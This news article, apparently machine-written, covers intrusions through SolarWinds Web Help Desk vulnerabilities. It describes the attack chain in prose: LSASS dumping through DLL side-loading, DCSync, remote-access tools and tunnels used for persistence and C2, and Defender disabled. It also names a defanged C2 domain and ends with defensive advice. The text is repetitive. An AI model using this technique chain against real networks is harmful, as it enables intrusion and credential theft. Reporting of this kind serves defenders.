Ethical Hacking News
SolarWinds Web Help Desk instances have been exploited by threat actors for remote code execution (RCE) in a multistage attack on corporate networks. Microsoft's security research team has detected vulnerabilities (CVE-2025-40551 and CVE-2025-26399) being used to gain initial access, move laterally across the network, and establish persistence. Users are advised to keep their WHD instances up-to-date, remove unauthorized RMM tools, rotate service accounts, and isolate compromised machines to limit the breach.
SolarWinds was exploited by threat actors to gain remote code execution (RCE) and move laterally across corporate networks. The attack involved exploiting vulnerabilities in the SolarWinds Web Help Desk (WHD) instances to obtain initial access and escalate privileges. Threat actors used living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms to establish persistence and move laterally across the network. The attackers conducted credential theft by dumping the contents of LSASS memory using a rogue DLL. A similar attack was detected on February 7, 2026, involving Zoho Meetings and Cloudflare tunnels for persistence and a legitimate forensics tool called Velociraptor for command-and-control (C2).
SolarWinds, a leading provider of IT management software, has been exploited by threat actors to gain remote code execution (RCE) and move laterally across corporate networks. According to Microsoft's security research team, the attack involved exploiting vulnerabilities in the SolarWinds Web Help Desk (WHD) instances to obtain initial access and escalate privileges.
The attack began with an unauthenticated remote code execution vulnerability (CVE-2025-40551) in the WHD instance, which allowed attackers to run arbitrary commands within the application context. The compromised service then spawned PowerShell to leverage BITS (Background Intelligent Transfer Service) for payload download and execution.
Threat actors followed up with a series of actions to establish persistence and move laterally across the network. They enumerated sensitive domain users and groups, including Domain Admins, and established persistence via reverse SSH and RDP access. The attackers also attempted to create scheduled tasks to launch a QEMU virtual machine under the SYSTEM account at system startup.
Furthermore, threat actors used DLL side-loading on some hosts using "wab.exe," a legitimate system executable associated with the Windows Address Book, to launch a rogue DLL ("sspicli.dll") and dump the contents of LSASS memory. This allowed them to conduct credential theft.
The attack was carried out in at least one case involving a DCSync attack, where a Domain Controller (DC) is simulated to request password hashes and other sensitive information from an Active Directory (AD) database.
Microsoft advises users to keep WHD instances up-to-date, find and remove any unauthorized RMM tools, rotate service and admin accounts, and isolate compromised machines to limit the breach. This activity reflects a common but high-impact pattern: a single exposed application can provide a path to full domain compromise when vulnerabilities are unpatched or insufficiently monitored.
The use of living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms by threat actors reinforces the importance of defense in depth, timely patching of internet-facing services, and behavior-based detection across identity, endpoint, and network layers.
According to Huntress researchers, a similar attack was detected on February 7, 2026, where the threat actor rapidly deployed Zoho Meetings and Cloudflare tunnels for persistence, as well as a legitimate forensics tool called Velociraptor for command-and-control (C2). The incident involved launching "cmd.exe" to install a remote MSI payload associated with Zoho ManageEngine RMM, establishing remote access by configuring the Zoho Assist agent for unattended access, and registering the compromised host to a Zoho Assist account tied to a Proton Mail address.
The threat actors also leveraged the Zoho Assist remote session to deploy Velociraptor version 0.73.4, an outdated version with a known privilege escalation vulnerability (CVE-2025-6264), and used the Velociraptor agent to execute PowerShell commands to check for the presence of "code.exe," a Visual Studio Code binary with the likely intent of establishing a remote tunnel.
The attackers also installed Cloudflared to establish an additional tunnel-based channel for redundant access to the compromised host. They executed a PowerShell script that collects comprehensive system information and transmits it directly to an attacker-controlled Elastic Cloud instance.
In another case, threat actors disabled Windows Defender and Windows Firewall via Registry modifications. They also executed a script that implements a live C2 failover mechanism for the Velociraptor agent to connect it to a different server ("v2-api.mooo[.]com") if the original Cloudflare workers[.]dev domain has been detected.
Threat actors created scheduled tasks that use QEMU to open an SSH backdoor as a persistence mechanism. The attackers also used DLL side-loading on some hosts using "wab.exe" to launch a rogue DLL ("sspicli.dll") and dump the contents of LSASS memory, allowing them to conduct credential theft.
Related Information:
https://www.ethicalhackingnews.com/articles/SolarWinds-Web-Help-Desk-Exploited-for-Remote-Code-Execution-A-Multistage-Attack-on-Corporate-Networks-ehn.shtml
https://thehackernews.com/2026/02/solarwinds-web-help-desk-exploited-for.html
https://nvd.nist.gov/vuln/detail/CVE-2025-40551
https://www.cvedetails.com/cve/CVE-2025-40551/
https://nvd.nist.gov/vuln/detail/CVE-2025-6264
https://www.cvedetails.com/cve/CVE-2025-6264/
https://attack.mitre.org/campaigns/C0024/
https://www.bentleybiosec.com/thesolarwindshackapt29
https://learn.microsoft.com/en-us/unified-secops/microsoft-threat-actor-naming
https://thehackernews.com/2026/02/apt28-uses-microsoft-office-cve-2026.html
Published: Thu Feb 19 00:00:48 2026 by llama3.2 3B Q4_K_M
